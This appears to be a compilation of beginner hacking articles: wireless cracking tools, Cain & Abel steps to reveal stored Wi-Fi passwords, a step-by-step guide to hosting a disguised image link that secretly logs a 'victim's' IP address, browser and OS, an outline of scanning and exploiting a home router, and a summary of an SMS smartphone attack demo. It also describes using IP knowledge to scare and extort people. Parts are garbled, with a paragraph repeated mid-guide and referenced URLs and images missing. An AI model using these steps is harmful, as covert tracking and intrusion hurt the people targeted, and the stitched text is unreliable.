Tools used for hacking wireless networks

To be able to properly use and understand these tools, we recommend you

develop a solid ethical hacking foundation as well as learn a few
programming languages.

Here’s a list of some of the most popular tools used to hamper computer
network security:

Aircrack

AirSnort

Kismet

Cain & Abel

WireShark

Fern WiFi Wireless Cracker

CoWPatty

Wifiphisher

KisMac

Reaver

How to hack a wireless network

Finally, let’s get into the step by step tutorial to decode the stored wireless
network passwords.

Firstly, download Cain & Abel from the provided link

Secondly, ensure that you are in the range of a network that you wish to hack
and try and connect.

Open Cain & Abel

Select the “Decoders” tab

From the navigation menu select “Wireless Passwords”

Tap on the plus sign (+) button

The decoder will show encryption type, SSID and the password that was once
used to access the network.
Securing wireless networks

Now that you know how to hack a WiFi network, it’s time to know about a
few steps you can take to avoid someone hacking your WiFi. After all, you
cannot become an ethical hacker without knowing how to hack and how to
prevent a hack.

Change the default passwords that come with the hardware

Enable authentication mechanism

Allowing only registered MAC addresses can restrict Access to the network.

Using strong WEP and WPA-PSK keys as well as passwords with a

combination of symbols, number and characters can reduce the chance of the
keys being cracked by the use of a dictionary and brute force attacks

Firewall Software can help reduce unauthorized access.

How to hack IP addresses (proven way with steps)

How to hack IP addresses with a proven way (creating a logging website)

Maybe someone scared you claiming to know your IP address. On the other
hand, you could be the one trying to scare a friend by getting his IP address.
Or, maybe, you just want to hear the truth about hacking IP address. Look no
further, because in this guide we will give you all the truth. We will explain
you how to hack IP addresses by following this agenda:

A quick introduction to what IP addresses are

How to hack IP addresses

How hackers find out an IP address

What can a hacker do when he knows your IP address

After reading this guide, you will be able to find out the IP address of
potentially anyone, silently.

Is this legal?

Under most circumstances, it is. Knowing someone’s IP address is part of a

“normal” communication over the Internet, so there is no problem in doing
that. However, if you use the IP address to violate someone else’s PC, you
are committing a crime under many jurisdictions. We do not endorse such
activity. Everything you read should be tried on systems you own and control
personally. We are not responsible for your actions.
Furthermore, remember that this is not legal advice. We are IT guys, not
lawyers. If you are looking for legal advice it’s better to call your attorney.

Before Hack IP addresses

Before we start hacking, we should spend a few words on IP addresses. In IT,

and in hacking specifically, never do anything without knowing what you are
doing. Indeed, this concept is important here. A lot of people talk about “hack
IP addresses” without even knowing what an IP address is. This can lead to
unjustified fear among the ones being hacked or exaggerated glory among
those who hack. What “hack an IP address” really mean? What can you do
with that? Now, we are going to demystify IP address hacking.
What is an IP address?

An IP address is nothing more than a numeric identifier. It identifies a PC,

smartphone, or any other device in a network, like the Internet. You can think
of it like a snail mail address. If I know your snail mail address I know where
you are, and I can send you some letters. With an IP address, I can know
(roughly) where your device is, and send you some Internet traffic.

In other words, you are identified by your IP address over the Internet.
Typically, your Internet provider assigns a public IP address to your router in
your house. When your devices in your home network want to send traffic
over the Internet, they will use that public IP address (shared among all of
them).

The communication over the Internet happens with packets. Each piece of
data is put in a packet, you can think of it as a letter. On the envelope, you
always write source and destination IP addresses. The Internet will take care
of delivering the packet to the right destination. Now, as you can see, if you
send traffic out you will write your IP as source IP. This is the only way the
other part can know it, and send some traffic back.

Do we really need to use our real IP address as source?

Of course! Imagine you want to download a movie, see a web page, or

anything else you do over the Internet. You contact a third-party server,
which sends you the content you requested. It needs to know where to send it,
so it needs to know your IP.

Am I in danger?
It depends, but in most cases, you aren’t. As from the paragraph above,
knowing someone else’s IP is legitimate. You need it to send traffic back.
What if your IP address ends up in the wrong hands? Just by knowing your IP
address, nobody can harm you. However, they can start to scan your PC and
see if you have vulnerabilities they can use to gain access to your data. We
will get to that later.
How to find out someone’s IP address?

In the following section, we are going to cover an out-of-the-box technique.

However, it relies on a simple principle: your victim needs to send you some
traffic. If he does that, boom, you have his IP address. Your PC already
learns such an IP address, but it doesn’t show it to you. We will see how to
see it.
Some misconceptions and old techniques

The Internet is full of poor content about hacking IP addresses. You might
read about hacking IP addresses with Skype and get excited about that, but
since 2017 this is not possible anymore. So, for this article, we are going to
use the best way to hack an IP address. We are going to use the only way that
depends uniquely on you, not third-party services. Because of that, it will
always work.

Furthermore, it is simple to apply and easy to use.

What’s behind our technique

The idea behind our technique is simple. You basically give your victim a
link: they can open it with their mobile, PC, or any sort of device. On that
link, they will see an image of your choice (we recommend using a fun one).
However, your system will also track automatically their IP address and more
information, like the browser they are using and their operating system.

While this happens, they will see the fun image and have a laugh about it.
They have no way of knowing that you are tracking their IP address.

Step #1 – Register a website (for free!)

You want to give your victim a valid link to click, and it must be valid online.
Therefore, we need to register a website. There are a lot of free services
online to register a website, and among them, we have chosen x10 hosting.
Go to their website and register a new account.

As a first thing, they will ask you to select a domain image. Use a credible
one for the kind of images you want to share.

Continue with the registration and verify your email. Once you complete the
process, you will end up on the homepage where you will have to create a
website. Now you are going to say “Wait, I thought we already created
that!”… well, sort of. Until now, we created the name. Now, we have to
prepare the software running behind it.

Step #2 – Creating the website itself

The home will look like the one below. From there, just click the green Add
Website button on the top right.

A quick wizard will open. From there, we have to tune a few items. Before
everything else, select “Custom Website” website. Then, as a website name,
write something that reminds the website, like its domain name. As the last
thing, leave the address path empty. Then, click on Add Website.

Create the website, then select “Continue to my website” on the next page.
Congratulation, we are almost there!

Step #3 – Download the IPFinder script

Now your website is ready. All we need to do is uploading the script that will
take care of saving IP addresses and delivering the images to the user.
Fortunately, you don’t need to write that script on your own: instead, we did
it for you. It uses a PHP file, three HTAccess files, and two folders.
Our IPFinder script comes in a useful zip package that you can download for
free by using the link below. Just click on it and download the zip file.

Now that you have it, don’t even unzip it. We will do that on the website
directly: move on to the next step.

Step #4 – Upload the IPFinder Script

From the website pages, select the File Manager option. This will open a new
window that looks similar to Explorer in Windows. A website is just a
collection of files on a public server. With this File Manager, you can have a
look at those files. To them, we need to add our script.

Once you are in the file manager, select Upload (1). This will open a new
window, where you can click “Browse” and search for the file you
downloaded. Select that compressed file (ipfinder.zip) and wait for the upload
to complete. Then, close this window and click Reload (2) in the previous
window.

Now you should see a new file in the list, right below “cgi-bin”. This is our
zipped package containing IPFinder, and we just need to extract it.

Step #5 – Extract the IPFinder

Select the ipfinder.zip so that its background turns blue. Then, from the top
menu, select Extract.

A new window will pop-up. Just click on Extract File(s) without changing
anything. Then, wait for the process to finish, and, as soon as it does, click
the Close button. You will have some more files and folders on your list. In
case you don’t, just hit the Reload button as we did previously.
At this point, I recommend you to delete the ipfinder.zip file. You don’t need
it anymore, as we have extracted its content. So, just click it and then click
the delete button at the top. This step is not mandatory, but it is a good
practice.

Step #6 – Adding images

Our IPFinder comes without images. However, it is a script that shows an

image and logs the IP of the viewer. Therefore, you need to add your own
images. So, find a jpeg image that you think would work for this purpose. At
the moment, our script only supports JPEG/JPG images. Once you have that
image, rename it with a simple name without spaces. Then, double-click on
the images folder to view its content.

Maybe someone scared you claiming to know your IP address. On the other
hand, you could be the one trying to scare a friend by getting his IP address.
Or, maybe, you just want to hear the truth about hacking IP address. Look no
further, because in this guide we will give you all the truth. We will explain
you how to hack IP addresses by following this agenda:

Step 7# – Using IPFinder

Now your IPFinder is ready to go. How do we use it? It is very simple, as it
automatically creates the URL we need. Your URL to share with your
victims will be something like this one.

In this URL, each part is customizable.

The domain name is the name of your website, the one you selected when
you created the account. You won’t be able to change this. In our case, this is
“coolimages”.

The image name is the name of the picture you uploaded, so in our case, this
is “meme.jpg”

The user ID is something you should select carefully. Here you can write any
combination of letters and numbers you want. Now we will see how to use it

Selecting the User ID

IPFinder will save a new text file for each victim that sees the image in the
log folder. That file contains the date, time, and the User ID you specify. The
purpose of this field is to let you differentiate between users. Think about it,
what if you want to give the link to multiple people? How can you know
which IP corresponds to which person? You cant. With this approach, you
would send to John the link to /meme.jpg/john and to Alice the link to
/meme.jpg/alice. They will both see the same picture, but you will log their
IPs separately.

Hack IP addresses, getting the results

Browse the log folder. You will see some text files with the names explained
above. Open any of them and read their content (select it and click Edit). In
each, you will see something like this.

What can you do with hacked IP addresses?

At this point, you have your IP finder in place. You shared some images, thus
getting some IP. You can know truly hack IP addresses, but you are still
wondering what can someone do with IP addresses. On the other hand, you
might be the one who believes to be hacked, and you want to know if you are
in real danger. Look no further, here we will tell you the ultimate truth about
what happens after you hack IP addresses.

Hack IP addresses to scare people

A lot of self-proclaimed hackers hack IP addresses just to scare people. They

contact the person and tell them they know their IP address, and maybe their
browser. A normal PC user will believe they have accessed their PC, how
would they know which browser they use otherwise? So, people get scared
and start believing in the hacker.

I’ve heard stories about “hackers” who managed to extort money from
someone with this approach. They basically make them believe they had
access to their data and threatened to share some personal pictures or
something like that. The truth is, they didn’t even know if those pictures
really existed. However, they approached everyone with the same words. As
a result, they would scare the hell out of anyone holding such kind of
pictures. Of course, such activity is illegal.

Geolocating you

If you get someone’s IP address, you can geolocate it very approximately.

The location will be a few square kilometers accurate in urban areas, and a
few dozens square kilometers accurate in rural areas. This is a rule of thumb
and might vary, but you will be never accurate enough.

Only your service provider, and thus the police, can locate you precisely with
your home address. For the others, you need to get by with only knowing the
city or county.
Truly gain access to the device or to personal data

If someone knows your IP address, he can scan you. This means he can try to
detect the system you are running and your vulnerabilities. Now, since the
public IP address of yours is on your home router, they will do that for your
router. They will gain access to your router and, from that, they will adopt the
same approach to gain access to your PC.

This process is long and complex and requires a skilled hacker. However, it
always follows the same guidelines.

Find exposed services (with nmap) and try to detect the hardware and
software version with the TCP signature

Look for common exploits on the exposed services, or for that specific
hardware/software

Try to gain access with brute force

Try to create a custom exploit

Of course, the fourth step is so hard that many hackers will simply give up.
That step if for someone with skills and budget that wants to hack specifically
you.

How can I defend myself?

In many connections, rebooting your router will change your public IP

address. That’s it. If a hacker was attacking you, they will have to find your
IP again.
Furthermore, you can increase the level of security by using a VPN or a
proxy chain like TOR. In this case, you basically contact a server you trust
(maybe own) somewhere on the Internet. Then, that server makes requests on
the web for you. In case someone tracks your IP address, they will track the
IP address of that server.
How to Hack a Smartphone

Meir Machlin of Trust Digital demonstrates how to hack a smartphone using

SMS.

Machlin walked us through two hacks using basic tools available to anyone.
Machlin's 'hacker tool kit' included a laptop with WiFi connectivity, and two
phones. One phone acts as a GSM modem for the laptop, the other phone is
Machlin's personal phone, which he used to receive information. A third
phone served as our target device, the phone that was 'under attack' in the
demonstration.

The first attack we watched is known as a 'Midnight Raid,' because it is often

pulled off during the night when the phone's user is asleep and the device is
still turned on as it is charged, or simply left on the nightstand.

Machlin sent a simple SMS which invoked Internet Explorer on the attack
device. First, Machlin sent a graphic to the target phone that said "You have
been hacked" to show just how quick and easy it is to get into another user's
phone with SMS. In the second push, Machlin ran an application on the
attacked phone that could retrieve data. The SMS came back to Machlin's
phone with the attack phone's INSI number; the phone's unique ID. However,
Machlin noted the application could have just as easily have stolen a contact
list, either personal or corporate. He said it was also possible in this scenario
to push viruses to the device or even initiate a denial of service attack.
How to Hack a Smartphone, Part 2
Meir Machlin of Trust Digital continues his demonstration of how to hack a
smartphone.

In the second demonstration (which you can view in "How to Hack a

Smartphone, Part 2"), Machlin ran through a control message attack. In this
kind of hack, a criminal can change the control settings of a device without
the user having any knowledge. He showed us how he could easily uncheck
SSL, leaving the device vulnerable with no encryption. As a finale, he pushed
a wipe command, which removed all stored information from the device. The
wipe, said Machlin, could also be pushed to all devices contained in a hacked
phone's contact list.

The attacks, according to Machlin, prove that texts can no longer be

considered safe. And these kinds of hacks are unique to smartphones because
PCs don't have SMS capabilities, he said.

Which smartphones are vulnerable to these kinds of attacks? That varies

widely depending on the security settings and practices in place for use of the
device. Some contend that mobile devices still pose little security threat to an
organization. In fact, in a recent hacking "contest" that took place in March,
none of the smartphones slated for attack were compromised. However, a
report from Gartner analyst John Girard predicts as wireless devices become
more pervasive in the enterprise, the potential for security problems will
increase.

Machlin advised all smartphones that are under an organization's control be

tightly monitored, patched and updated regularly to avoid users taking
matters in their own hands.
Conclusion

This article covers all the basic and most commonly used hacked devices and
methods or strategies to perform the attack. This is a complete guide to learn
how to hack for beginners free of cost. This article makes the following terms
clear for the beginners to get started on the hack track.

For the newbie, it’s quite hard to find out from where he can get hands on
practice.